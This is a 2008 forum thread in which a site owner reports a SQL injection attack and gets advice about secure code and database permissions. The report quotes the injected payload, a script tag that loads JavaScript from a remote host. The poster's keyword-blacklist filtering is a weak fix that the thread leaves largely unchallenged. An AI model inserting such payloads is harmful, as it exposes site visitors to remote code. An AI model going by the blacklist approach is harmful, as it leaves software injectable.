ASP or SQL Server flaw ????

surajkala · May 15th, 2008, 03:52 AM

Hi

Recently we moved our site from Access to MS SQL Server 2005 Express on a dedicated server.

Guess what.... we came under some attack (may be SQL injection).

Our database was manipulated and data's in some field were replaced by "<script src=http://9i5t.cn/a.js></script>"

We don't know how it was done .. then i googled around to find any clue . too my surprise i found around 30,000 sites which were affected by this / have a look
http://www.google.com/search?hl=en&q...22&btnG=Search

And also an interest fact popped up also sites where in ASP

But unfortunately no documentation was available for it ...

So i wonder if their is any flaw in coding or database permission .. 30,000 webmaster can't go wrong. May be their is security flaw either in SQL Server 2005 or ASP .. can't say

As of now i have cleared my database using find and replace function. But i know we might me soon be under attack again

Please help me out find out exact reason for it ..

Thanks in advance
Suraj jain

Imar · May 15th, 2008, 04:31 AM

Hi there,

This is a combination of a SQL injection attack and poor database security settings. Some of the problems could have been mitigated by stricter security settings while the problem could have been prevented with secure code. Don't be fooled by the numbers; 30,000 (I only see 3,000) affected pages is nothing compared to the size of the Internet.

Searching for "sql injection" should reveal the source of the problem and offer many solutions (e.g. make your code "sql attack safe".

Cheers,

Imar

---------------------------------------
Imar Spaanjaars
http://Imar.Spaanjaars.Com
Everyone is unique, except for me.
Author of Beginning ASP.NET 3.5 : in C# and VB, ASP.NET 2.0 Instant Results and Dreamweaver MX 2004
Want to be my colleague? Then check out this post.

surajkala · May 18th, 2008, 02:13 PM

Hi .. Thanks for the reply ..

I m now santizing all variable b4 building m sql statements. I hope that wud save us from further INJECTION attack in future..

thanks once again

Suraj jain

Imar · May 18th, 2008, 03:03 PM

If you protect your data the way you spell, I'd be pretty worried.... ;)

Imar
---------------------------------------
Imar Spaanjaars
http://Imar.Spaanjaars.Com
Everyone is unique, except for me.
Author of Beginning ASP.NET 3.5 : in C# and VB, ASP.NET 2.0 Instant Results and Dreamweaver MX 2004
Want to be my colleague? Then check out this post.

surajkala · May 19th, 2008, 03:07 AM

Hi IMAR ..

Are there any other preventive measure which i should take care of for preventing SQL Injection ..

Currently i m validating all my query string items which i use to build my sql statements like removing symbols and removing deadly words like Delete , Update Etc.

I guess .. thats not all ..

I m bit ignorant about the permission for database. Since i run a a portal i need both read and write permission for a user . so i had created a new db user and assigned it to two permission and i m using the above mentioned all over my site to connect to database

1. Connect to Sql
2. Control Database

Is it okay ????

Thanks in advance
Suraj jain

Imar · May 19th, 2008, 03:15 AM

You may want to take a look at the BOL (Books Online) of SQL Server for more info about security. "Control Database" is quite a vague term, so I can't tell if that is right or not. In the BOL you can learn more about permissions, roles and so on.

The fewer the permissions, the less chance of being attacked. For example, if you give the account only read permissions, the account can't write and thus cannot be used to insert illegal data.

Additionally, you should Google for "SQL Injection"; there's lots of stuff to find, including tips to prevent it.

Cheers,

Imar

---------------------------------------
Imar Spaanjaars
http://Imar.Spaanjaars.Com
Everyone is unique, except for me.
Author of Beginning ASP.NET 3.5 : in C# and VB, ASP.NET 2.0 Instant Results and Dreamweaver MX 2004
Want to be my colleague? Then check out this post.